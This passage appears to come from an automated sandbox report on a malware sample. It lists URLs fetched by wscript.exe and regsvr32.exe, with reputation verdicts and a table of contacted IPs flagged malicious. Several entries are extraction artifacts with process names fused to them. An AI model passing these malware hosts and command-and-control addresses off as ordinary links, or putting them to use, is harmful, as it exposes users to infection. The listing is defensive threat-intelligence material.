              http://softwareulike.com/cWIYxWMPkK/wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • 16%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/eBregsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              https://159.89.202.34/regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • 19%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              https://182.162.143.56/regsvr32.exe, 0000000C.00000003.451389170.00000000012FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/#regsvr32.exe, 0000000C.00000003.480911858.00000000012C4000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              https://91.121.146.47:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/regsvr32.exe, 0000000C.00000003.421394475.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480911858.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451113819.00000000012E1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012E1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/xregsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              https://pe2.162.143.56/regsvr32.exe, 0000000C.00000003.480911858.00000000012C4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451389170.00000000012C4000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.000000000512D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/regsvr32.exe, 0000000C.00000003.480911858.00000000012C4000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://91.121.146.47:8080/regsvr32.exe, 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://160.16.142.56:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://187.172.199.165:8080/regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://160.16.142.56:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl//6(regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://www.gomespontes.com.br/logs/pd/vMwscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://167.172.199.165:8080/lregsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://167.172.199.165:8080/regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://159.89.202.34/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/hregsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/ITregsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://91.121.146.47:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/000regsvr32.exe, 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllwscript.exe, 00000009.00000003.349639269.000000000538E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349867697.0000000005396000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/nregsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://portalevolucao.com/GerarBoleto/fLIOoFbwscript.exe, 00000009.00000003.347225816.00000000050AC000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ozmeydan.com/cekici/9/wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://penshorn.org/wscript.exe, 00000009.00000003.349954279.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.350000568.000000000540A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.354012857.000000000540A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351723775.0000000005423000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.354073376.0000000005423000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wMwscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://www.gomespontes.com.br/logs/pd/wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.000000000512D000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://penshorn.org/admin/Ses8712iGR8du/tMwscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              https://167.172.199.165:8080/mwollpl/regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jwscript.exe, 00000009.00000003.347973913.000000000529E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348372206.00000000052DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348646615.0000000005321000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348586602.00000000052F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348295456.00000000052AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351610411.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.353640909.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348732137.0000000005328000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348458187.00000000052EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348118755.00000000052A6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uMwscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://softwareulike.com/cWIYxWMPkK/7wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.346224913.0000000005175000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345755235.0000000005160000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.353529377.000000000518B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347751255.0000000005182000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348256209.0000000005189000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://66.228.32.31:7080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/regsvr32.exe, 0000000C.00000003.451389170.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451113819.000000000133A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/wscript.exe, wscript.exe, 00000009.00000002.353832790.00000000053B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F4F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349674998.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347830775.0000000005237000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347700894.0000000005210000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.335628212.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.338453916.0000000004EF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345054891.00000000050AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://softwareulike.com/cWIYxWMPkK/yMwscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/l/regsvr32.exe, 0000000C.00000003.451113819.00000000012E1000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: malware
              		unknown
              https://167.172.199.165:8080/8regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.480859658.000000000133A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://159.89.202.34/Iregsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllNZrwscript.exe, 00000009.00000003.349283109.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349438794.0000000005384000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349093361.000000000536E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349339319.000000000537A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://softwareulike.com/cWIYxWwscript.exe, 00000009.00000003.347973913.000000000529E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348372206.00000000052DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348646615.0000000005321000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348586602.00000000052F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348295456.00000000052AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351610411.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.353640909.0000000005331000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348732137.0000000005328000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348458187.00000000052EB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348118755.00000000052A6000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://ozmeydan.com/cekici/9/xMwscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://187.63.160.88:80/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/01regsvr32.exe, 0000000C.00000003.480788885.000000000334E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.580495908.000000000334F000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wscript.exe, 00000009.00000003.348896452.0000000005346000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337749840.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345265478.0000000005158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.351239933.00000000052BD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.342436422.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.340495152.0000000004F55000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348209733.0000000005208000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349520694.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347622434.000000000512D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345132720.00000000050C0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345037298.000000000510B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.345791230.00000000050EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.343112035.0000000004FCF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337309001.0000000000AB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.337545792.0000000000AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.349571912.00000000053A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.343189350.0000000004FAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.347462886.00000000051C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.343401747.0000000005065000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zMwscript.exe, 00000009.00000003.350048423.0000000004B54000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://66.228.32.31:7080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/_regsvr32.exe, 0000000C.00000003.451389170.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.451113819.000000000133A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://159.89.202.34/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://160.16.142.56:8080/regsvr32.exe, 0000000C.00000002.579752485.00000000012FE000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://164.90.222.65/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
              https://163.44.196.120:8080/3regsvr32.exe, 0000000C.00000002.579752485.000000000133A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              110.232.117.186
              		unknownAustralia
              		56038RACKCORP-APRackCorpAUtrue
              103.132.242.26
              		unknownIndia
              		45117INPL-IN-APIshansNetworkINtrue
              104.168.155.143
              		unknownUnited States
              		54290HOSTWINDSUStrue
              79.137.35.198
              		unknownFrance
              		16276OVHFRtrue
              115.68.227.76
              		unknownKorea Republic of
              		38700SMILESERV-AS-KRSMILESERVKRtrue
              163.44.196.120
              		unknownSingapore
              		135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue
              206.189.28.199
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              203.26.41.131
              		penshorn.orgAustralia
              		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
              107.170.39.149
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              66.228.32.31
              		unknownUnited States
              		63949LINODE-APLinodeLLCUStrue
              197.242.150.244
              		unknownSouth Africa
              		37611AfrihostZAtrue
              185.4.135.165
              		unknownGreece
              		199246TOPHOSTGRtrue
              183.111.227.137
              		unknownKorea Republic of
              		4766KIXS-AS-KRKoreaTelecomKRtrue
              45.176.232.124
              		unknownColombia
              		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
              169.57.156.166
              		unknownUnited States
              		36351SOFTLAYERUStrue
              164.68.99.3
              		unknownGermany
              		51167CONTABODEtrue
              139.59.126.41
              		unknownSingapore
              		14061DIGITALOCEAN-ASNUStrue
              167.172.253.162
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              167.172.199.165
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              202.129.205.3
              		unknownThailand
              		45328NIPA-AS-THNIPATECHNOLOGYCOLTDTHtrue
              147.139.166.154
              		unknownUnited States
              		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
              153.92.5.27
              		unknownGermany
              		47583AS-HOSTINGERLTtrue
              159.65.88.10
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              172.105.226.75
              		unknownUnited States
              		63949LINODE-APLinodeLLCUStrue
              164.90.222.65
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              213.239.212.5
              		unknownGermany
              		24940HETZNER-ASDEtrue
              5.135.159.50
              		unknownFrance
              		16276OVHFRtrue
              186.194.240.217
              		unknownBrazil
              		262733NetceteraTelecomunicacoesLtdaBRtrue
              119.59.103.152
              		unknownThailand
              		56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue
              159.89.202.34
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUStrue
              91.121.146.47
              		unknownFrance
              		16276OVHFRtrue
              160.16.142.56
              		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
              201.94.166.162
              		unknownBrazil
              		28573CLAROSABRtrue
              91.207.28.33
              		unknownKyrgyzstan
              		39819PROHOSTKGtrue
              103.75.201.2
              		unknownThailand
              		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
              103.43.75.120
              		unknownJapan20473AS-CHOOPAUStrue
              188.44.20.25
              		unknownMacedonia
              		57374GIV-ASMKtrue
              45.235.8.30
              		unknownBrazil
              		267405WIKINETTELECOMUNICACOESBRtrue
              153.126.146.25
              		unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
              72.15.201.15
              		unknownUnited States
              		13649ASN-VINSUStrue
              187.63.160.88
